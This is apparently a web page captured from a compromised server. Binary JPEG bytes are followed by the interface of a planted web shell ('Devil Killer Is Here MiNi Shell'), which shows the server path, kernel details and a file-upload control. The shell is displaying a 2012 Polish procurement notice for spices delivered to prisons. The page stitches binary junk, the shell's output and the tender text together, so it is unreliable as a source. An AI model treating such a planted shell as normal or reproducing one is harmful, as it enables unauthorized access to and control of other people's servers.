JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121228/273029-N-2012.html

<p class="kh_header"><b>Gdańsk: DOSTAWY PRZYPRAW znak sprawy: 13/2012/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 273029 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bigb-baltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY PRZYPRAW znak sprawy: 13/2012/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Dostawy przypraw:
1. Sól biała warzona jodowana spożywcza w opakowaniu 1kg, ilość szacunkowa 440 opakowań. CPV: 15872400-5.
2. Cukier biały w opakowaniu 1kg, ilość szacunkowa 3000 opakowań. CPV: 15831200-4.
3. Cukier waniliowy w opakowaniu 30g-40g, ilość szacunkowa 260 opakowań. CPV:15831000-2.
4. Słodzik, 250-350 tabletek w opakowaniu - automat, tabletka o masie 50-60mg, ilość szacunkowa 640 opakowań. CPV: 15830000-5.
5. Słodzik, 1100-1300 tabletek w opakowaniu - automat, tabletka o masie 50-60mg, ilość szacunkowa 720 opakowań. CPV: 15830000-5.
6. Pieprz czarny mielony w opakowaniu 15g-20g, ilość szacunkowa 1000 opakowań. CPV: 15872100-2.
7. Pieprz czarny mielony w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV: 15872100-2.
8. Papryka ostra mielona w opakowaniu 20g-30g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
9. Papryka słodka mielona w opakowaniu 20g-30g, ilość szacunkowa 130 opakowań. CPV: 15870000-7.
10. Liść laurowy w opakowaniu 20-30g, ilość szacunkowa 150 opakowań. CPV: 15870000-7.
11. Przyprawa Vegeta Podravka w opakowaniu 75g, ilość szacunkowa 600 opakowań. Skład m.in.: sól kuchenna, suszone warzywa-15,5% (w tym: marchew, pasternak, cebula, seler, natka pietruszki). CPV: 15870000-7.
12. Przyprawa do potraw Warzywko uniwersalne - smak świeżych warzyw w opakowaniu 75g, ilość szacunkowa 600 opakowań. Skład m.in.: sól, warzywa suszone-15,1% (w tym: marchew, cebula, pasternak, liście selera, natka pietruszki, czosnek, papryka, pomidory). CPV: 15870000-7.
13. Przyprawa Delikat do mięs 200 g, ilość szacunkowa 600 opakowań CPV: 15870000-7.
14. Czosnek granulowany w opakowaniu 20g-30g, ilość szacunkowa 880 opakowań. CPV: 15870000-7. 
15. Czosnek granulowany w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV:15870000-7.
16. Majeranek w opakowaniu 20g-30g, ilość szacunkowa 340 opakowań. CPV: 15870000-7.
17. Majeranek w opakowaniu 1 kg, ilość szacunkowa 200 opakowań. CPV: 15870000-7.
18. Oregano w opakowaniu 10g-20g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
19. Liście bazylii w opakowaniu 10g-20g, ilość szacunkowa 180 opakowań. CPV: 15870000-7.
20. Cynamon mielony w opakowaniu 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
21. Koperek w opakowaniu 8g-15g, ilość szacunkowa 400 opakowań. CPV: 15870000-7.
22. Susz z liści pietruszki w opakowaniu 10g-20g, ilość szacunkowa 400 opakowań. CPV: 15870000-7.
23. Chili w opakowaniu 20g-30g, ilość szacunkowa 120 opakowań. CPV: 15870000-7.
24. Przyprawa do zup, sosów, sałatek w płynie Winiary 210g, ilość szacunkowa 180 opakowań. CPV: 15870000-7.
25. Przyprawa kucharek w opakowaniu 1 kg, ilość szacunkowa 26 opakowań. CPV: 15870000-7.
26. Kwasek cytrynowy do celów spożywczych w opakowaniu 20g-30g, ilość szacunkowa 2550 opakowań. CPV: 15870000-7.
27. Soda oczyszczona do celów spożywczych w opakowaniu 75g-85g, ilość szacunkowa 240 opakowań. CPV: 15870000-7.
28. Zaprawa cytrynowa w opakowaniu 200 ml, ilość szacunkowa 120 opakowań. CPV: 15870000-7.
29. Włocławek koncentrat pomidorowy 30% w opakowaniu 1 litr, ilość szacunkowa 156 opakowań. CPV: 15331427-6.
30. Włocławek ketchup łagodny w opakowaniu 1 litr, ilość szacunkowa 156 opakowań. CPV: 15871230-5.

31. Włocławek ketchup pikantny w opakowaniu 480g, ilość szacunkowa 1100 opakowań. CPV: 15871230-5.
32. Ketchup pikantny Pudliszki w opakowaniu 480g, ilość szacunkowa 1100 opakowań. Skład m.in.: pomidory 183g na 100g ketchupu. CPV: 15871230-5.
33. Ketchup pikantny w opakowaniu 400g-500g, ilość szacunkowa 1800 opakowań. CPV: 15871230-5.
34. Ketchup Tortex w tubie plastikowej 500 g, ilość szacunkowa 200 opakowań, CPV:15871230-5.
35. Majonez pomorski stołowy Ocetix w opakowaniu 260g, ilość szacunkowa 1800 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
36. Majonez pomorski stołowy Ocetix w opakowaniu 620g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
37. Majonez dekoracyjny Winiary w opakowaniu 400 ml, ilość szacunkowa 300 opakowań. Skład m.in.: olej roślinny, żółtko jaj-6%, ocet, musztarda, cukier, sól. Średnia zawartość odżywcza w 100ml produktu: tłuszcz 76,1g. CPV: 15871273-8.
38. Majonez w tubie 450g-550g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.

39. Musztarda stołowa w opakowaniu (plastik) 180g-220g, ilość szacunkowa 310 opakowań. CPV: 15871250-1.
40. Musztarda sarepska w opakowaniu (plastik) 450g-550g, ilość szacunkowa 1800 opakowań. CPV: 15871250-1.
41. Musztarda sarepska Ocetix w opakowaniu 180g-220g, ilość szacunkowa 900 opakowań. CPV: 15871250-1.
42. Chrzan tarty w opakowaniu 170g-200g, ilość szacunkowa 450 opakowań. CPV: 15870000-7.
43. Chrzan łowicki naturalny Urbanek w opakowaniu 180g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
44. Ziele angielskie w opakowaniu 20g-30g, ilość szacunkowa 120 opakowań. CPV: 15870000-7.
45. Przyprawa do kebaba-gyros 30g-50g, ilość szacunkowa 120 opakowań. CPV: 157870000-7.
46. Żelatyna spożywcza 50g spożywcza wieprzowa zwykła od 50g-80g, ilość szacunkowa 120 opakowań. CPV: 15892400-1.
47. Barszczyk czerwony koncentrat w opakowaniu szklanym od 300g-330g, ilość szacunkowa 120 opakowań. CPV: 15891400-4.
48. Ocet spirytusowy rektyfikowany 10%, ocet wyprodukowany z przedestylowanego alkoholu pochodzenia rolniczego, w opakowaniu szklanym 500g, ilość szacunkowa 200 opakowań. CPV: 15871110-8.
49. Ocet winny  6 % w opakowaniu szklanym 0,5l   ilość szacunkowa 200 opakowań. CPV: 15871120-1. 
50. Sos sojowy w opakowaniu szklanym 150 ml  ilość szacunkowa 200 opakowań. CPV: 15871210-9. 
51. Żur w opakowaniu szklanym  0,5l  ,zakwas z mąki żytniej i pszennej poddany naturalnej fermentacji, ilość szacunkowa 300 opakowań. CPV: 15851000-8
52. Kminek mielony 20-30 g ,ilość szacunkowa 300 opakowań, CPV:15872300-4
53. Tymianek  20-30 g ,ilość szacunkowa 300 opakowań, CPV:15872300-4
54. Cząber 20-30 g ,ilość szacunkowa 300 opakowań, CPV:15872300-4
55. Pieprz ziołowy w opakowaniu od 20-25 g ,ilość szacunkowa 300 opakowań, CPV:15872200-3
56. Przyprawa do kurczaka  od 20-30 g ,ilość szacunkowa 300 opakowań, CPV:15871270-7
57. Przyprawa do ryb  od 20-30 g ,ilość szacunkowa 300 opakowań, CPV:15870000-7 
58. Przyprawa meksykańska  od 20-30 g ,ilość szacunkowa 300 opakowań, CPV:15871270-7   
59. Imbir w opakowaniu 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15872500-6.
60. Gałka muszkatołowa 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
61. Zioła prowansalskie 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15872300-4.
62. Curry w opakowaniu 20g-30g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
Dostarczane ww. artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, z długim okresem przydatności do spożycia dla danego artykułu, w zamkniętych i nieuszkodzonych opakowaniach, które posiadają nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz gramaturze lub litrażu.
Wykonawca dostarcza artykuły w opakowaniach, które nie są wykonane ze szkła oraz z metalu, za wyjątkiem: przyprawy do zup, sosów, sałatek (poz. 24,50,51), koncentratu pomidorowego (poz. 29), barszczyku czerwonego koncentrat (poz. 47), octu (poz. 48,49),chrzanu (poz.43),majonezu (poz 35,36,37),ketchup (poz.,30,31)              .
Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 4 do siwz, tj. formularz dotyczący porównania parametrów artykułów.  
Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, w sposób zapobiegający utracie walorów smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1;
b) Zakładu Karnego w Bydgoszczy-Fordon, ul. Rynek 8;
c) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4;
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27;
e) Zakładu Karnego w Czersku, ul. Dworcowa 29;
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22;
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17;
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46 ,Aresztu Śledczego w Chełmnie, ul. 22 stycznia 3a, Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4, Aresztu Śledczego w Toruniu, ul. Piekary 53 - od 01.01.2013r;
i) Zakładu Karnego we Włocławku, ul. Bartnicka 10 - dostawy zaczną się najprawdopodobniej w trakcie 2013 r.
2) Realizacja dostaw do magazynu w uzgodnionych terminach, nie mniej niż 3 razy w tygodniu w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.24.00-5, 15.83.12.00-4, 15.83.10.00-2, 15.87.12.73-8, 15.87.00.00-7, 15.87.23.00-4, 15.87.11.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności ,jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
Zamawiający dokona oceny spełniania poszczególnych warunków w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII  tj.1 podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
Zamawiający dokona oceny spełniania poszczególnych warunków w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII tj.1podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
Zamawiający dokona oceny spełniania poszczególnych warunków w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII  tj.1 podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
Zamawiający dokona oceny spełniania poszczególnych warunków w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII  tj.1podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 do siwz 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.

IX.	Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII. pkt 1., których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII. pkt 3., wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII. pkt 2., których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII. pkt 3., wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz)
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp (załącznik nr 3 do siwz).
3. Wyjaśnienia:
1) Wykonawcy wspólnie ubiegających się o zamówienie (np. konsorcjum, spółka cywilna) do oferty dołączają:
a) pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Pzp, które zawiera m.in.: nazwy i adresy członków np. konsorcjum lub spółki cywilnej, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz podpisy przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji
b) oświadczenie wyszczególnione w pkt 1. ppkt 1) podpisane przez pełnomocnika lub wszystkich uprawnionych przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji
c) dokumenty wyszczególnione w pkt 2. ppkt 1) i ppkt 2) złożone przez wszystkich wykonawców tworzących np. konsorcjum, spółkę cywilną.
2) Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp (warunków określonych w niniejszej siwz w rozdziale VIII. pkt 1) polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdziale IX. pkt 2. ppkt 1)-2) i załączenia ich do oferty.
3) Wszystkie dokumenty i oświadczenia wymienione w pkt 1. i 2. mają być złożone w formie oryginału lub kserokopii. Jeżeli wykonawca przedłoży kserokopię dokumentu to potwierdza go i podpisuje na każdej stronie przez osobę(y) uprawnioną do podpisania oferty, z dopiskiem za zgodność z oryginałem.
4) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w ppkt 2), kopie dokumentów dotyczących odpowiednio wykonawców lub tych podmiotów są poświadczane za zgodność z oryginałem (w sposób określony w ppkt 3) przez wykonawcę lub te podmioty.
5) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2. ppkt 2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsca zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Niniejszy dokument, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w ppkt 5), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ppkt 5) stosuje się odpowiednio.
7) Dokumenty sporządzone w języku obcym składane są do oferty wraz z tłumaczeniem na język polski.
8) W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy ich składania w niniejszym postępowaniu, rozstrzygającym jest Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
